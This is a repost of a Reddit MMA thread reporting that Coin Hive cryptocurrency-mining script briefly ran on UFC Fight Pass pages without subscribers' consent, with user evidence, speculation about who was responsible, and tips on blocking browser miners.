.
.

UFC Fight Pass Tried To Exploit Paying Subscribers By Using Their PCs To Mine Crypto Currency

UFC Fight Pass Tried To Exploit Paying Subscribers By Using Their PCs To Mine Crypto Currency

 

 

UFC Fight Pass is in general considered one of the more reputable streaming companies in the combat sports business which is why it was so surprising when one subscriber noticed his CPU usage spiking as he would browse the programming.

As a reminder UFC Fight Pass is home of the Eddie Bravo Invitational and many other programs and documentaries at a low price of $9.99 USD.

A known bjj breakdowns author Gambledub noticed this first. He wrote:

I noticed this because my anti virus kept pinging off every time I went on Fight Pass. It’s not harmful AFAIK, but doing this on a service we’re paying for is fucked up imo. I researched Coin Hive (mentioned by my anti virus) and found the javascript on their website, and sure enough it’s running on Fight Pass.

Right after you log in. Notice the “Welcome” at the top left beind the anti virus notification…

Appears it’s been removed now. Still this is really bad that they tried to do this.

EDIT Damn this blew up!

For all the people saying it was something on my end, such as an ad or browser plugin. Here is a different screenshot from twitter around the same time this thread was posted.

Here’s another tweet from 19 hours ago (at the time of editing) mentioning the same thing.

Here is u/boobloop mentioning it 6 hours before this thread was made in the daily discussion thread.

Look at this comment chain from earlier in the thread. Where it was also found by /u/ThatGamingSupportGuy

Or here, where /u/twoofseven also notices a CPU spike (more workload from PC components)

Important It’s really worth pointing out that this isn’t an ongoing issue. Here, it was confirmed that it was removed by several users (10 hours before this edit, and well before the post blew up).

However, what we do know is that this was an issue for at least 9-10 hours before it was resolved.


Don’t Understand what was happening?

Your device or computer could have potentially been used to mine crypto currency (bitcoin is one you may have heard of, but not the one being mined in this case) while/if you had a fight pass tab open.

This can cause your CPU (on a computer) to work harder, costing more in electricity (although likely minimal amounts) or causing your battery to drain on a mobile device. It is likely that if you were mining you would see a negative impact on your performance, due to increased workload. It can also cost you more in electricity on a wired device (although minimal.) There is also a slight potential that over time, increased strain on your electronic components lead to damage and shorter lives of said components.

So, what’s the problem?

Firstly, the UFC have not adressed this AT ALL. Despite having at least 20 hours of people telling them about it.

Secondly, there was no notification that data mining was happening. No option or consent to allow it, as it happened automatically, and judging by the “ELI5” posts, very little understanding of the ramifications by most people using the site.

Thirdly, this is a service that WE ALREADY PAY FOR! This is one of the big issues people are overlooking. If they want to mine currency of your computer instead of using advertisments or subscriptions that is one thing. But if you are already paying for a Fight Pass subscription, you SHOULD NOT be paying extra to make someone else money. Even if it cost you 0.000001 cent, it is the principle.

Who did it? & why it is really important

At this point there are 3 people who could be responsible…

  • The UFC. (most unlikely)
  • A rouge employee/contractor of the UFC. (such as a web developer behind Fight Pass)
  • A hacker unaffiliated with the UFC.

Here’s the concerning thing. In the unlikely event this was intentionally done by the UFC it is at best extremely unethical in many peoples opinions. At worst it is potentially illegal, as seen in the similar situation with ESEA where they were fined $1 Million.

However, even if it is not the UFC directly, it raises an additionally awkward question. How good is the security protocols if someone can do this. Think about it, for a site with access to peoples Facebook accounts and credit card information, the fact that this happened is not good.

Regardless of who did it, the UFC has to take at least part of the blame. The fact we have yet to hear ANYTHING from them, is concerning at best.

As I typed this u/Jamester1 posted

I emailed UFC about this earlier this morning and they finally responded with this… “Thank you for contacting us on this issue. We take these matters very seriously, and will review this. UFC.TV Support ”

How do I stay safe?

While it is extremely unlikely you suffered any damage or are at any enhanced risk from this incident, this is likely to become more commonplace over time with many sites, learn to protect yourselves. There are some great responses to this comment by u/1cosha1 & u/totally_rocks about using UBlock and Antiminer to protect yourself which you should definitely check out.

Misconceptions

I’ve seen a few people mention Bitcoin mining, this is not the case in this example. Bitcoin tends to be more GPU intensive and doesn’t work very well relying on CPU power. Monero was likely the crypto currency being mined which works better for CPU based setups.

Also worth noting, but Moreno has had a sharp increase in value over the last 24 hours. Potentially unrelated but worth pointing out.

Also a lot of people are blaming Coin Hive. As far as I can tell they are not compliant at all and seem to be getting blamed unfairly. They advise against using the software in this manner. They are like torrent sites, in that they have legitimate uses, but can be abused which is what we’re seeing here. From what I understand the Coin Hive was designed to be an alternative to traditional web advertisements. Not as an additional profit supplement to advertising and/or subscription fees that we are seeing here.

source: reddit mma